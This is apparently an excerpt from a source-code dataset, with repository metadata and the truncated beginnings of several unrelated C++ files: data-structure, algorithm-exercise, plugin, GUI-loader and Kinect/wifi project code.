] | permissive | eswiss/geofeatures | 7346210128358cca5001a04b0e380afc9d19663b | 1ffd5fdc49d859b829bdb8a9147ba6543d8d46c4 | refs/heads/master | 2020-04-05T19:45:33.653377 | 2016-01-28T20:11:44 | 2016-01-28T20:11:44 | 50,859,811 | 0 | 0 | null | 2016-02-01T18:12:28 | 2016-02-01T18:12:28 | null | UTF-8 | C++ | false | false | 66 | hpp | ../../../../../../../GeoFeatures/boost/preprocessor/repetition.hpp | [
"hatter24@gmail.com"
] | hatter24@gmail.com |
8cb4fcd36f5cdaa66e408e864888e6b578836e95 | b0cc833a609541d6f01a6a5d3b4d03908da50d31 | /List03/List.h | 8014bd8e70325903bd138ff98ae7321bbba460f6 | [] | no_license | Wakie01/Data-Structure | 8c8fe9c19e428a685c41d1746e841de2d587f84d | 5e8f8178b7ba625b3becd779e224bab4e4cc9f72 | refs/heads/master | 2021-09-28T18:50:04.682829 | 2018-11-19T14:57:50 | 2018-11-19T14:57:50 | 113,398,394 | 1 | 0 | null | null | null | null | GB18030 | C++ | false | false | 2,417 | h | #ifndef LIST_H
#define LIST_H
#include"Coordinate.h"
template<typename T>
class List{
public:
List(int size);
~List();
void ClearList();
bool ListEmpty();
int ListLength();
bool GetElem(int i,T *e);
int LocateElem(T *e);
bool PriorElem(T *currentElem,T *preElem);
bool NextElem(T *cu... | [
"33743772+Wakie01@users.noreply.github.com"
] | 33743772+Wakie01@users.noreply.github.com |
fed78661ac5c17310eb240d6ec2eaf7416964abb | 79abec37c8a92264b7d157533a21df53057757c7 | /src/uscxml/plugins/datamodel/prolog/swi/SWIDataModel.cpp | fe881dcfaf3230bce0566b3cd26c63ceeaaf9eb9 | [] | no_license | jbeard4/uscxml | 594c820a21e0b2320849922d4d83670978514bfc | 7c779099b3acd1fa969dde718299484ebe0d2775 | refs/heads/master | 2021-01-16T20:22:40.229648 | 2013-02-10T19:50:07 | 2013-02-10T19:50:07 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,635 | cpp | #include "uscxml/Common.h"
#include "uscxml/config.h"
#include "SWIDataModel.h"
#include "uscxml/Message.h"
#include <glog/logging.h>
#ifdef BUILD_AS_PLUGINS
#include <Pluma/Connector.hpp>
#endif
namespace uscxml {
#ifdef BUILD_AS_PLUGINS
PLUMA_CONNECTOR
bool connect(pluma::Host& host) {
host.add( new SWIDataModelP... | [
"radomski@tk.informatik.tu-darmstadt.de"
] | radomski@tk.informatik.tu-darmstadt.de |
1b95cfb825ee27038bcf3a558dc425387352f03a | efa8a2d3fbaa3b6f18a1d69e6c9ac201101d4a95 | /Algorithms/chapter15/iron_v3.cpp | 946773cf11b5535e5265e87723f7e5304f11ae99 | [] | no_license | linkpark/study | 3e4b438e4ef596d1ac8b1f189e33dea97b81dc04 | 12aad5c13cdb46a51fa07da250cd9a34c97e4086 | refs/heads/master | 2021-06-13T14:56:47.968546 | 2017-04-24T08:59:40 | 2017-04-24T08:59:40 | 22,249,446 | 0 | 4 | null | null | null | null | UTF-8 | C++ | false | false | 959 | cpp | #include <iostream>
#include <cstdio>
using namespace std;
int price[1000] = {0,1,5,8,9,10,17,17,20,24,30};
int cutRod(int length,int *r,int *s){
r[0] = 0;
s[0] = 0;
int q,i,j;
if( 0 == length){
return 0;
}
for(i = 1 ; i <= length ; i++){
q = -1;
for(j = 1 ; j <= ... | [
"wj@newStudy-65.newStudy-65"
] | wj@newStudy-65.newStudy-65 |
20318d5767a4505866e43746f0fc95d5940c4cf4 | 65754e5f893e71df31d02ce41c9e177ae70faced | /wifProjectForDesk2改进剪辑版/wifProject/wifProject/wifiProject.cpp | 1234877ec061c031bbf8cba8f4e0b0ba406e8c88 | [] | no_license | square123/wifiProject | 3cd33ab569e72a099e1413f350eae6967ed8f912 | f71c7475264a8ef2115495c34b2e0f4416b7f3de | refs/heads/master | 2021-01-12T04:56:26.475047 | 2017-11-23T03:55:13 | 2017-11-23T03:55:13 | 77,812,653 | 0 | 1 | null | null | null | null | GB18030 | C++ | false | false | 4,714 | cpp | #include"myKinect.h"
#include"wifi.h"
#include <ctime> //用于时间函数
#include<sstream> //用以类型转换
#include <fstream>
#define peopleDisThd 2500 //画面检测人的深度阈值 先用ruler做测试
#define peopleTimThd 10 //筛选时间阈值
#define screenFilePath "E://projectTest//"
/*/////////////////////////////////////////////////////////////////////////
程序使用... | [
"1006039518@qq.com"
] | 1006039518@qq.com |
9c26c8e3ca5052d63b15056b5a4ef32ec36af304 | 2d361696ad060b82065ee116685aa4bb93d0b701 | /src/gui/widgets/loaders/agp_load_page.cpp | 0d4c7020f581e2cd7b7b0443761832063d80e724 | [
"LicenseRef-scancode-public-domain"
] | permissive | AaronNGray/GenomeWorkbench | 5151714257ce73bdfb57aec47ea3c02f941602e0 | 7156b83ec589e0de8f7b0a85699d2a657f3e1c47 | refs/heads/master | 2022-11-16T12:45:40.377330 | 2020-07-10T00:54:19 | 2020-07-10T00:54:19 | 278,501,064 | 1 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 7,129 | cpp | /* $Id: agp_load_page.cpp 38672 2017-06-07 21:13:40Z katargir $
* ===========================================================================
*
* PUBLIC DOMAIN NOTICE
* National Center for Biotechnology Information
*
* This software/database is a "United States Governmen... | [
"aaronngray@gmail.com"
] | aaronngray@gmail.com |
296c50b9f141dd8d7f206d72c68cce2c457c6f65 | c37fc0308322c49773cfae61d6283949aeff6ef1 | /HackerEarth/Algorithms/monk-encounter-with-poly.cpp | 3c9eab23f60fac18a5395a43d790d013a978640c | [] | no_license | sagarmittal1/CP-Practice | 59a899b0e62c62f959989ca0182a0278c5483c51 | 0aaf97dac4da684429373cdc004d32e12d87e1db | refs/heads/main | 2023-08-15T00:45:29.581219 | 2021-10-04T19:38:10 | 2021-10-04T19:38:10 | 305,486,471 | 7 | 4 | null | 2021-10-04T19:38:10 | 2020-10-19T19:03:28 | C++ | UTF-8 | C++ | false | false | 726 | cpp | #include <bits/stdc++.h>
using namespace std;
#define IOS ios::sync_with_stdio(0); cin.tie(0);
#define endl "\n"
#define int long long
int a, b, c, k;
int F(int x) {
return a * x * x + b * x + c;
}
int binarySearch() {
if (c >= k) return 0;
int l = 1;
int h = ceil(sqrt(k));
while (l <= h) {
int mid = l + ... | [
"mittalsagar006@gmail.com"
] | mittalsagar006@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.